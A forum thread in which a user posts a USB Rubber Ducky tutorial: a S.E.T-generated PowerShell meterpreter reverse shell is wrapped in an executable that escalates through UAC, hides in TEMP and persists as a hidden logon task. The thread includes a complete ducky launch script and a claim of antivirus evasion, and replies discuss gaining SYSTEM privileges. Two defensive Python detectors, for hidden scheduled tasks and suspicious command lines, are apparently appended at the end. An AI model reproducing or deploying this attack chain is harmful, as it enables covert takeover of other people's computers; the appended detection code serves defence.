chaz

Posts posted by chaz

  1. 4 hours ago, henna3 said:

    Everything works except the persistence. Can't get that to work for some reason. Do you know how to fix this?

    Nice script though chaz!!

    The reboot persistence? I don't mean that if a session dies it will come back to life; it will just execute again when rebooted. If you could check Task Scheduler to see if a task is created and get back to me, that would be awesome! And thanks btw :)

  2. 1 hour ago, mrdeep said:

    This looks solid. I compiled the program and will try it out on my ducky later! A small pro tip: you need to escape quotation marks if they appear in your script. Like so:

    
    pInstance.AddScript("powershell -w 1 -C \"sv SS....

    Or it won't compile correctly.

    Thanks for this. I will update later.

    Yeah, definitely, though all the PowerShell scripts that I've generated with S.E.T don't have any quotation marks; but for non-programmers, a very good tip!

  3. 3 hours ago, Shonenx333 said:

    The payload works (except I had to change the PowerShell execution to use Process, not PowerShell, because Win7 threw an exception right there). I also modified the PSExec a little bit. payload.txt does contain the part after -EncodedCommand, so you can swap the payload easily without needing to recompile the PSExec every time, which may not be possible every time.

    Thanks, nice idea :) It works as expected; you will get Sys Privs easily (except for Win10, which may be an MSF problem) and the payload stays persistent with SysPrivs after reboot.

    Nice work ;)

    Good to hear! Glad you got it working on Windows 7, and yeah, having the script as an external resource to load at runtime is probably a better idea! Interestingly, I had no issues with System Privs and Windows 10; I just executed 'getsystem' in my meterpreter prompt and I got elevated (even after reboot).

    Thanks for your kind words :)

    Hi there, I'm new to this forum and so I thought I'd introduce myself with a nice tutorial! :) I've created a ducky script and coded an executable which will achieve the title of this topic. This makes use of the Twin Duck firmware, so that is a prerequisite before starting unless you can apply the same thing to ducky-decode or similar. Another prerequisite is .NET Framework 4.5, but PCs with Win 8+ have this by default and loads of applications use it, so the likelihood of a pre-Win 8 PC not having it is fairly low (I might make a native payload later).

    What the executable does:

    -  Checks for specific current privileges, e.g. Admin, Admin user group, non-privileged user.

    -  Depending on privilege level, either continues execution or attempts to elevate.

       (If the user is in the Admin user group it will display a normal UAC prompt so the ducky script we use later can hit 'ALT Y'.)

    -  Copies itself and the required DLLs to the default TEMP directory, and sets all of those files to be hidden.

    -  Creates a hidden Task Scheduler task which runs the executable on each user logon.

    -  Executes the encoded PowerShell payload.

    Why smart privilege checking is important:

    If a completely non-privileged user were to execute the program and it asked for UAC anyway, then a prompt like this would appear:

    [screenshot of the UAC prompt]

    This is obviously problematic; in this circumstance we would rather our payload ran with normal privileges, because non-privileged access is better than no access, right? This is why I have incorporated the privilege escalation into the executable rather than the ducky script, so this prompt is never displayed and instead we get a normal user-level meterpreter shell. Now, if a user is part of the Admin group, then we see a dialog like this:

    [screenshot of the UAC dialog]

    This is where we'd like our ducky script to hit 'ALT Y', and bam! We can then just use meterpreter's 'getsystem' command and we're away!

    Tutorial:

    What you'll need:

    -  Windows PC/VM with Visual Studio 2013/2015/2017 installed (free downloads from Microsoft).

    -  Linux-based PC/VM for generating our payload and listening for connections. Preferably Kali Linux, as we will be using S.E.T (Social Engineering Toolkit) to generate our PowerShell payload.

    -  USB Rubber ducky (with Twin Duck or similar firmware installed)

    -  This Visual Studio project: http://www37.zippyshare.com/v/9GYYXKVl/file.html (unzip it on your Windows PC/VM first)

    Let's start:

    -  On the Kali Linux side of things, let's open S.E.T by going to 'Applications' -> 'Social Engineering Tools' -> 'social engineering toolkit'.

    -  You will be presented with various options, hit '1' and then enter.

    -  Again more options, hit '9' or whichever number corresponds to 'Powershell Attack Vectors' and then enter.

    -  More options, hit '1' and then enter.

    -  Give it your local IP (or external IP if you want a connection from outside your local network; this would require port forwarding).

    -  Give it a port and then say 'yes' when it asks if you want to start the listener.

    -  Now type this command (change path if necessary): 'sudo php -S 0.0.0.0:80 -t /root/.set/reports/powershell/'

    -  You have just started a web server on port 80. Navigate over there in your Windows PC's web browser with the file name in the path, like so: '192.168.0.XXX/x86_powershell_injection.txt'

    You should be faced with this screen:

    [screenshot of the payload text in the browser]

    -  Select all the text and copy it.

    -  Open Visual Studio and click 'Open Project'. Navigate to the 'PSExec' folder that you unzipped and select the Visual Studio solution file:

    [screenshot of selecting the solution file]

    -  Go to the line with the pre-inserted PowerShell payload (Line 64):

    [screenshot of Line 64 in the project]

    -  Replace the text within the double quotes with the payload you got from the web server earlier.

    -  Go to the Build menu at the top and click 'Build Solution'. Make sure the drop-downs below the menu bar say 'Release' and 'Any CPU'; if not, just change them.

    -  Navigate to the path it gives at the bottom in the console window to find the DLLs and exe file we need.

    -  Plug your Ducky's micro SD card into your PC and copy the files called 'PSExec.exe', 'Microsoft.Win32.TaskScheduler.dll' and 'JetBrains.Annotations.dll' to your ducky drive.

    -  Now we need our ducky payload; here is the code:

    REM Awesome script
    DELAY 500
    GUI R
    DELAY 50
    STRING cmd /k "for /f %a in ('wmic logicaldisk get volumename^,name ^| find "DUCKY"') do start "" %a\PSExec.exe"
    DELAY 50
    ENTER
    DELAY 1500
    ALT Y
    DELAY 1000
    STRING exit
    DELAY 50
    ENTER
    DELAY 50
    STRING exit
    DELAY 50
    ENTER

    -  Generate your inject.bin file with an encoder.

    -  Copy the inject.bin to your Ducky's drive and there we have it!

    Some caveats:

    -  The 'PSExec.exe' file is totally undetected by antiviruses, but if an antivirus wants to scan the file before running it, it may interfere with the ducky script.

    -  Slower PCs may need slightly longer delays in the ducky script, but hey, just experiment until it works!

    So tell me what you think, feedback is greatly appreciated!

    • Upvote 2
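Post 1 asks the reader to check Task Scheduler for the task the executable registers, and post 4 describes what that task looks like: hidden, triggered at every user logon, running an executable copied to TEMP. The Python below is an added example, not code from this thread or from chaz's PSExec project. It triages an exported task definition for exactly that combination. The two XML samples are constructed to match the shape of `schtasks /query /xml` output (schema namespace http://schemas.microsoft.com/windows/2004/02/mit/task, XML declaration omitted); the author value, paths and the `updater.exe`/`backup.exe` names are placeholders, not values from the thread.

```python
import xml.etree.ElementTree as ET

# Namespace of every Task Scheduler XML export (schtasks /query /xml output and
# the files under C:\Windows\System32\Tasks).
TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Launch locations a logon-triggered task has no business running from.
TEMP_MARKERS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\", "%temp%\\", "%tmp%\\")


def triage_task_xml(xml_text: str) -> dict:
    """Pull out the properties that matter and decide whether the task matches
    the pattern from the thread: hidden, run at logon, executable in TEMP."""
    root = ET.fromstring(xml_text.strip())
    hidden = root.findtext("t:Settings/t:Hidden", default="false",
                           namespaces=TASK_NS).strip().lower() == "true"
    logon_trigger = root.find("t:Triggers/t:LogonTrigger", TASK_NS) is not None
    run_level = root.findtext("t:Principals/t:Principal/t:RunLevel",
                              default="LeastPrivilege", namespaces=TASK_NS).strip()
    commands = [
        cmd.text.strip().strip('"')
        for cmd in root.iterfind("t:Actions/t:Exec/t:Command", TASK_NS)
        if cmd.text
    ]
    from_temp = any(marker in cmd.lower()
                    for cmd in commands for marker in TEMP_MARKERS)

    reasons = []
    if hidden:
        reasons.append("hidden from the Task Scheduler UI")
    if logon_trigger:
        reasons.append("runs at every user logon")
    if from_temp:
        reasons.append("executable lives in a TEMP directory")
    if run_level == "HighestAvailable":
        reasons.append("requests the highest available privilege")

    return {
        "author": root.findtext("t:RegistrationInfo/t:Author", default="",
                                namespaces=TASK_NS),
        "commands": commands,
        "reasons": reasons,
        # A TEMP-resident executable alone is odd; combined with being hidden
        # or logon-triggered it is the persistence described in the thread.
        "suspicious": from_temp and (hidden or logon_trigger),
    }


def load_task_file(path: str) -> str:
    """Task files under C:\\Windows\\System32\\Tasks are UTF-16 with a BOM; the
    utf-16 codec strips the BOM so the text can go straight to triage_task_xml."""
    with open(path, encoding="utf-16") as fh:
        return fh.read()


# Constructed samples modelled on schtasks /query /xml output. Author, paths
# and executable names are placeholders.
SUSPICIOUS_TASK_XML = """
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>EXAMPLE-PC\\user</Author></RegistrationInfo>
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Principals><Principal id="Author"><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Settings><Hidden>true</Hidden><Enabled>true</Enabled></Settings>
  <Actions Context="Author">
    <Exec><Command>C:\\Users\\user\\AppData\\Local\\Temp\\updater.exe</Command></Exec>
  </Actions>
</Task>
"""

BENIGN_TASK_XML = """
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>EXAMPLE-PC\\user</Author></RegistrationInfo>
  <Triggers><CalendarTrigger><StartBoundary>2017-01-01T09:00:00</StartBoundary>
    <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay></CalendarTrigger></Triggers>
  <Principals><Principal id="Author"><RunLevel>LeastPrivilege</RunLevel></Principal></Principals>
  <Settings><Hidden>false</Hidden><Enabled>true</Enabled></Settings>
  <Actions Context="Author">
    <Exec><Command>"C:\\Program Files\\Example\\backup.exe"</Command><Arguments>/quiet</Arguments></Exec>
  </Actions>
</Task>
"""

if __name__ == "__main__":
    for label, xml_text in (("suspicious", SUSPICIOUS_TASK_XML), ("benign", BENIGN_TASK_XML)):
        result = triage_task_xml(xml_text)
        print(label, result["commands"], result["suspicious"], result["reasons"])
```

On a live host, feed it the output of `schtasks /query /XML /TN "\Path\TaskName"` or walk `C:\Windows\System32\Tasks` with `load_task_file`; every task that comes back `suspicious` is worth opening in the Task Scheduler UI with hidden tasks shown.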
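The command lines this approach leaves in process-creation logs are what a defender would hunt for: the `cmd /k "for /f ... wmic logicaldisk ... find "DUCKY" ... start` launcher typed by the ducky script above, the hidden-window `powershell -w 1 -C` invocation mrdeep quotes in post 2, and the `-EncodedCommand` form Shonenx333 describes in post 3. The Python below is an added example, not code from the thread: it tokenizes a command line, flags the drive-by-volume-label launcher and hidden or encoded PowerShell invocations, and decodes the base64 UTF-16LE text that `-EncodedCommand` carries. The sample command lines are constructed, and the encoded command is a harmless `Write-Output` built inline so the sample never contains a real payload.

```python
import base64
import re

# Constructed sample command lines, the kind a process-creation log (Sysmon
# event 1 or Security event 4688 with command-line auditing) would record.
# The encoded PowerShell command is a harmless Write-Output built right here.
SAMPLE_ENCODED = base64.b64encode(
    "Write-Output 'constructed sample'".encode("utf-16-le")
).decode("ascii")

SAMPLE_COMMAND_LINES = [
    # The launcher typed by the thread's ducky script.
    r'''cmd /k "for /f %a in ('wmic logicaldisk get volumename^,name ^| find "DUCKY"') do start "" %a\PSExec.exe"''',
    # Hidden-window PowerShell, the shape mrdeep quotes (body replaced).
    'powershell -w 1 -C "Get-Process | Out-Null"',
    # Hidden window plus an encoded command, the shape Shonenx333 describes.
    f"powershell -NoP -W Hidden -EncodedCommand {SAMPLE_ENCODED}",
    # Ordinary activity that must not be flagged.
    r"notepad.exe C:\Users\user\notes.txt",
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -File C:\Scripts\inventory.ps1",
]

POWERSHELL_NAMES = {"powershell", "powershell.exe", "pwsh", "pwsh.exe"}


def tokenize(cmdline: str) -> list:
    """Split on whitespace but keep double-quoted arguments together."""
    return re.findall(r'"[^"]*"|\S+', cmdline)


def decode_encoded_command(b64: str):
    """-EncodedCommand takes base64 of the UTF-16LE script text."""
    try:
        return base64.b64decode(b64.strip('"'), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_command_line(cmdline: str) -> dict:
    tokens = tokenize(cmdline)
    lower = cmdline.lower()
    reasons, decoded = [], None

    # cmd.exe enumerating drives with wmic, filtering on a volume label and
    # starting an executable from whichever drive letter matched.
    if (re.search(r"\bfor\s+/f\b", lower) and "wmic" in lower
            and "logicaldisk" in lower and re.search(r"\bstart\b", lower)):
        reasons.append("locates a drive by volume label and launches from it")

    image = re.split(r"[\\/]", tokens[0].strip('"').lower())[-1] if tokens else ""
    if image in POWERSHELL_NAMES:
        # powershell.exe accepts any unambiguous prefix of a parameter name,
        # so -w / -win / -WindowStyle and -e / -ec / -EncodedCommand all count.
        for i, tok in enumerate(tokens[1:], start=1):
            t = tok.lower()
            has_value = i + 1 < len(tokens)
            if (len(t) >= 2 and "-windowstyle".startswith(t) and has_value
                    and tokens[i + 1].lower() in ("1", "hidden")):
                reasons.append("hidden PowerShell window")
            if len(t) >= 2 and "-encodedcommand".startswith(t) and has_value:
                decoded = decode_encoded_command(tokens[i + 1])
                reasons.append("base64-encoded command")

    return {"reasons": reasons, "decoded": decoded}


if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        result = triage_command_line(line)
        print(result["reasons"] or ["no finding"], "<-", line[:70])
        if result["decoded"]:
            print("   decoded:", result["decoded"])
```

The decoded text is the part worth reading: a hidden window by itself appears in plenty of legitimate scheduled scripts, but a hidden window whose decoded command downloads and runs further code is the combination the tutorial produces.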